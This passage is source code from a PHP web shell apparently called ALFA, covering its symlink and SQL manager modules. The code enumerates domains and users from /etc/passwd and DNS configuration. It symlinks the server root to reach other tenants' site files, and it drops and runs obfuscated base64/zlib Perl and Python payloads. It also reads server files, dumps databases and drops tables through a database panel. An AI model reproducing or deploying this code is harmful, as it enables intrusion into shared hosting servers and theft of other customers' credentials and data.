4594function alfaGetDomains($state = false){
4595 $state = "named.conf";
4596 $lines = array();
4597 $lines = _alfa_file('/etc/named.conf');
4598 if(!$lines){
4599 $lines = @scandir("/etc/valiases/");
4600 $state = "valiases";
4601 if(!$lines){
4602 $lines = @scandir("/var/named");
4603 $state = "named";
4604 if(!$lines && $state){
4605 $lines = _alfa_file('/etc/passwd');
4606 $state = "passwd";
4607 }
4608 }
4609 }
4610 return array("lines" => $lines, "state" => $state);
4611}
4612function alfasymlink(){
4613alfahead();
4614AlfaNum(9,10);
4615echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
4616if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
4617 $sympath = alfaMakePwd();
4618 @mkdir('cgialfa',0755);
4619 @chdir('cgialfa');
4620 alfacgihtaccess('cgi');
4621 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
4622 $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
4623 $cginame = "symperl.alfa";
4624 $source = $perl;
4625 $lang = "perl";
4626 if($_POST["alfa2"]=="sympy"){
4627 $cginame = "pysymlink.alfa";
4628 $source = $py;
4629 $lang = "python";
4630 }
4631 @__write_file($cginame,$source);
4632 @chmod($cginame,0755);
4633 echo __pre();
4634 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
4635 if(strlen($resource) == 0){
4636 echo AlfaiFrameCreator('cgialfa/'.$cginame);
4637 }else{
4638 echo $resource;
4639 }
4640}
4641if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
4642if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
4643AlfaNum(9,10);
4644echo __pre().'
4645<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
4646<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
4647<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
4648<p><input type="submit" value=" " name="symlink" /></p></form></center>';
4649$path = $_POST['alfa5'];
4650$symname = $_POST['alfa6'];
4651$solevisible58 = $_POST['alfa7'];
4652if($solevisible58){
4653$new_name = str_replace(".", "_", basename($symname));
4654$rand_dir = $new_name.rand(111,9999);
4655$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
4656@mkdir($sym_dir, 0777, true);
4657alfacgihtaccess('sym', $sym_dir, $symname);
4658_alfa_symlink("$path","$sym_dir/$symname");
4659echo __pre();
4660echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
4661}
4662}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
4663}
4664if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
4665$cant_symlink = true;
4666if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
4667@mkdir('alfasymlink',0777);
4668alfacgihtaccess('sym','alfasymlink/');
4669_alfa_symlink('/','alfasymlink/root');
4670$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
4671if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
4672echo "<center>";
4673$lines = array();
4674$anony_domains = array();
4675$anonymous_users = array();
4676$f_black = array();
4677$error = false;
4678$anonymous = false;
4679$makepwd = "/home/{user}/public_html/";
4680$domains = alfaGetDomains();
4681$lines = $domains["lines"];
4682$state = $domains["state"];
4683$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
4684$can_runcmd = _alfa_can_runCommand(false,false);
4685if(!$is_posix && !$can_runcmd){
4686 $anonymous = true;
4687 $anony_domains = $domains["lines"];
4688 $lines = _alfa_file('/etc/passwd');
4689}
4690echo $table_header;
4691$count=1;
4692$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4693foreach($lines as $line){
4694 $domain = "";
4695 $owner = "";
4696 if($anonymous){
4697 $explode = explode(":", $line);
4698 $owner = $explode[0];
4699 $owner_len = strlen($owner) - 1;
4700 $userid = $explode[2];
4701 if((int)$userid < 500)continue;
4702 $domain = "[?????]";
4703 $temp_black = array();
4704 $finded = false;
4705 foreach($anony_domains as $anony){
4706 if($state == "named.conf"){
4707 if(@strstr($anony, 'zone')){
4708 preg_match_all('#zone "(.*)"#',$anony, $data);
4709 $domain = $data[1][0];
4710 }else{
4711 continue;
4712 }
4713 }elseif($state == "named" || $state == "valiases"){
4714 if($anony == "." || $anony == "..")continue;
4715 if($state == "named")$anony = rtrim($anony, ".db");
4716 $domain = $anony;
4717 }
4718 $sub_domain = str_replace(array("-","."), "", $domain);
4719 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
4720 if(in_array($owner.$domain, $temp_black))continue;
4721 $sympath = str_replace("{user}", $owner, $makepwd);
4722 $http = "http://".$domain;
4723 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4724 $count++;
4725 $temp_black[] = $owner.$domain;
4726 $finded = true;
4727 }
4728 }
4729 if(!$finded){
4730 $anonymous_users[] = $owner;
4731 }
4732 }else{
4733 if($state == "named.conf"){
4734 if(@strstr($line, 'zone')){
4735 preg_match_all('#zone "(.*)"#',$line, $data);
4736 $domain = $data[1][0];
4737 }else{
4738 continue;
4739 }
4740 }elseif($state == "named" || $state == "valiases"){
4741 if($line == "." || $line == "..")continue;
4742 if($state == "named")$line = rtrim($line, ".db");
4743 $domain = $line;
4744 }
4745 if(strlen(trim($domain)) > 2 && $state != "passwd"){
4746 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
4747 if($is_posix){
4748 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
4749 $owner = $user["name"];
4750 }elseif($can_runcmd){
4751 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
4752 }
4753 }
4754 }
4755 if(!$anonymous){
4756 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
4757 $sympath = str_replace("{user}", $owner, $makepwd);
4758 $http = "http://".$domain;
4759 if($state == "passwd"){
4760 $http = "javascript:alert('we cant find domain...')";
4761 }
4762 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4763 $count++;
4764 $f_black[] = $owner.$domain;
4765 }
4766}
4767if($anonymous){
4768 foreach($anonymous_users as $owner){
4769 $sympath = str_replace("{user}", $owner, $makepwd);
4770 $http = "javascript:alert('we cant find domain...')";
4771 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
4772 $count++;
4773 }
4774}
4775$cant_symlink = false;
4776}else{
4777$is_direct = false;
4778$makepwd = alfaMakePwd();
4779if(_alfa_file_exists("/etc/virtual/domainowners")){
4780 $makepwd = "/home/{user}/public_html";
4781 $is_direct = true;
4782}
4783$sole = _alfa_file("/etc/virtual/domainowners");
4784$count=1;
4785echo $table_header;
4786$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4787if($sole){
4788 foreach($sole as $visible){
4789 if(@strstr($visible,":")){
4790 $solevisible = explode(':', $visible);
4791 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
4792 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
4793 }
4794 }
4795}else{
4796 $passwd = _alfa_file("/etc/passwd");
4797 if($passwd){
4798 $html = "";
4799 $is_named = false;
4800 $users = array();
4801 $domains = array();
4802 $uknowns = array();
4803 foreach($passwd as $user){
4804 $user = trim($user);
4805 $expl = explode(":", $user);
4806 if((int)$expl[2] < 500)continue;
4807 $users[$expl[0]] = $expl[5];
4808 }
4809 $site_domains = @scandir("/etc/virtual/");
4810 if(!$site_domains){
4811 $site_domains = alfaEx("ls /etc/virtual/");
4812 $site_domains = explode("\n", $site_domains);
4813 if(!$site_domains){
4814 $site_domains = _alfa_file("/etc/named.conf");
4815 if($site_domains){$is_named = true;}
4816 }
4817 }
4818 foreach($site_domains as $line){
4819 if($is_named){
4820 if(@strstr($line, 'zone')){
4821 preg_match_all('#zone "(.*)"#',$line, $data);
4822 $domain = $data[1][0];
4823 if(strlen($domain > 2) && !empty($domain)){
4824 $domains[] = $domain;
4825 }
4826 }
4827 }else{
4828 $domains[] = $line;
4829 }
4830 }
4831 $x = 1;
4832 foreach($users as $user => $home){
4833 foreach($domains as $domain){
4834 $user_len = strlen($user) - 1;
4835 $sub_domain = str_replace(array("-","."), "", $domain);
4836 $five_user = substr($user, 0,$user_len);
4837 $five_domain = substr($sub_domain, 0,$user_len);
4838 if($five_user == $five_domain){
4839 if($is_direct){
4840 $cwd = str_replace("{user}", $user, $makepwd);
4841 }else{
4842 $expl = explode("}/", $makepwd);
4843 $cwd = $home."/".$expl[1];
4844 }
4845 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
4846 }else{
4847 $uknowns[$user] = $home;
4848 }
4849 }
4850 }
4851 $uknowns = array_unique($uknowns);
4852 foreach($uknowns as $user => $home){
4853 if($is_direct){
4854 $cwd = str_replace("{user}", $user, $makepwd);
4855 }else{
4856 $expl = explode("}/", $makepwd);
4857 $cwd = $home."/".$expl[1];
4858 }
4859 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
4860 }
4861 echo($html);
4862 }
4863}
4864echo "</table>";
4865$cant_symlink = false;
4866}
4867}else{
4868 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
4869 $cant_symlink = false;
4870}
4871if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
4872echo "</center></table>";
4873}
4874echo "</div>";
4875alfafooter();
4876}
4877function alfasql(){
4878if(!isset($_POST['sql_host'])){
4879$_POST['sql_host'] = $_SESSION["sql_host"];
4880$_POST['sql_login'] = $_SESSION["sql_login"];
4881$_POST['sql_pass'] = $_SESSION["sql_pass"];
4882$_POST['sql_base'] = $_SESSION["sql_base"];
4883}
4884class DbClass{
4885public $type;
4886public $link;
4887public $res;
4888function __construct($type){
4889$this->type = $type;
4890}
4891function connect($host, $user, $pass, $dbname){
4892switch($this->type){
4893case 'mysql':
4894if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
4895break;
4896case 'pgsql':
4897$host = explode(':', $host);
4898if(!$host[1]) $host[1]=5432;
4899if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
4900break;
4901}
4902return false;
4903}
4904function selectdb($db){
4905switch($this->type){
4906case 'mysql':
4907if(@mysqli_select_db($db))return true;
4908break;
4909}
4910return false;
4911}
4912function query($str){
4913switch($this->type){
4914case 'mysql':
4915return $this->res = @mysqli_query($this->link,$str);
4916break;
4917case 'pgsql':
4918return $this->res = @pg_query($this->link,$str);
4919break;
4920}
4921return false;
4922}
4923function fetch(){
4924$res = func_num_args()?func_get_arg(0):$this->res;
4925switch($this->type){
4926case 'mysql':
4927return @mysqli_fetch_assoc($res);
4928break;
4929case 'pgsql':
4930return @pg_fetch_assoc($res);
4931break;
4932}
4933return false;
4934}
4935function listDbs(){
4936switch($this->type){
4937case 'mysql':
4938return $this->query("SHOW databases");
4939break;
4940case 'pgsql':
4941return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
4942break;
4943}
4944return false;
4945}
4946function listTables(){
4947switch($this->type){
4948case 'mysql':
4949return $this->res = $this->query('SHOW TABLES');
4950break;
4951case 'pgsql':
4952return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
4953break;
4954}
4955return false;
4956}
4957function error(){
4958switch($this->type){
4959case 'mysql':
4960return @mysqli_error($this->link);
4961break;
4962case 'pgsql':
4963return @pg_last_error();
4964break;
4965}
4966return false;
4967}
4968function setCharset($str){
4969switch($this->type){
4970case 'mysql':
4971if(function_exists('mysql_set_charset'))
4972return @mysqli_set_charset($this->link,$str);
4973else
4974$this->query('SET CHARSET '.$str);
4975break;
4976case 'pgsql':
4977return @pg_set_client_encoding($this->link, $str);
4978break;
4979}
4980return false;
4981}
4982function loadFile($str){
4983switch($this->type){
4984case 'mysql':
4985return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
4986break;
4987case 'pgsql':
4988$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
4989$r=array();
4990while($i=$this->fetch())
4991$r[] = $i['file'];
4992$this->query('drop table solevisible');
4993return array('file'=>implode("\n",$r));
4994break;
4995}
4996return false;
4997}
4998function dump($table, $fp = false){
4999switch($this->type){
5000case 'mysql':
5001$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
5002$create = mysqli_fetch_array($res);
5003$sql = $create[1].";\n";
5004if($fp) fwrite($fp, $sql); else echo($sql);
5005$this->query('SELECT * FROM `'.$table.'`');
5006$head = true;
5007while($item = $this->fetch()){
5008$columns = array();
5009foreach($item as $k=>$v) {
5010if($v == null)
5011$item[$k] = "''";
5012elseif(is_numeric($v))
5013$item[$k] = $v;
5014else
5015$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
5016$columns[] = "`".$k."`";
5017}
5018if($head) {
5019$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
5020$head = false;
5021} else
5022$sql = "\n\t,(".implode(", ", $item).')';
5023if($fp) fwrite($fp, $sql); else echo($sql);
5024}
5025if(!$head)
5026if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
5027break;
5028case 'pgsql':
5029$this->query('SELECT * FROM '.$table);
5030while($item = $this->fetch()) {
5031$columns = array();
5032foreach($item as $k=>$v) {
5033$item[$k] = "'".addslashes($v)."'";
5034$columns[] = $k;
5035}
5036$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
5037if($fp) fwrite($fp, $sql); else echo($sql);
5038}
5039break;
5040}
5041return false;
5042}
5043};
5044$db = new DbClass($_POST['type']);
5045if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
5046$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5047$db->selectdb($_POST['sql_base']);
5048switch($_POST['charset']){
5049case "Windows-1251": $db->setCharset('calfa1251'); break;
5050case "UTF-8": $db->setCharset('utf8'); break;
5051case "KOI8-R": $db->setCharset('koi8r'); break;
5052case "KOI8-U": $db->setCharset('koi8u'); break;
5053case "calfa866": $db->setCharset('calfa866'); break;
5054}
5055$json = json_decode($_POST['alfa2'],true);
5056if(count($json['tbl'])>0){
5057if($_POST['alfa1']=='dumpfile'){
5058if($fp = @fopen($json['file'],'w')){
5059foreach($json['tbl'] as $v)$db->dump($v, $fp);
5060fclose($fp);
5061$dumpStatus = true;
5062}}else{
5063foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
5064}
5065}
5066unset($_POST['alfa2']);
5067}
5068alfahead();
5069echo "
5070<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
5071<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
5072<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
5073<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
5074<td><select name='type'><option value='mysql' ";
5075if(@$_POST['type']=='mysql')echo 'selected';
5076echo ">MySql</option><option value='pgsql' ";
5077if(@$_POST['type']=='pgsql')echo 'selected';
5078echo ">PostgreSql</option></select></td>
5079<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
5080<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
5081<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
5082$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
5083if(isset($_POST['sql_host'])){
5084if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
5085$_SESSION["sql_host"] = $_POST['sql_host'];
5086$_SESSION["sql_login"] = $_POST['sql_login'];
5087$_SESSION["sql_pass"] = $_POST['sql_pass'];
5088$_SESSION["sql_base"] = $_POST['sql_base'];
5089switch($_POST['charset']){
5090case "Windows-1251": $db->setCharset('calfa1251'); break;
5091case "UTF-8": $db->setCharset('utf8'); break;
5092case "KOI8-R": $db->setCharset('koi8r'); break;
5093case "KOI8-U": $db->setCharset('koi8u'); break;
5094case "calfa866": $db->setCharset('calfa866'); break;
5095}
5096$db->setCharset('utf8');
5097$db->listDbs();
5098echo "<select name=sql_base><option value=''></option>";
5099while($item = $db->fetch()) {
5100list($key, $value) = each($item);
5101echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
5102}
5103echo '</select>';
5104}
5105else echo $tmp;
5106}else
5107echo $tmp;
5108echo "</td>
5109<td><input type='submit' value=' '></td>
5110<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
5111</tr>
5112</table>
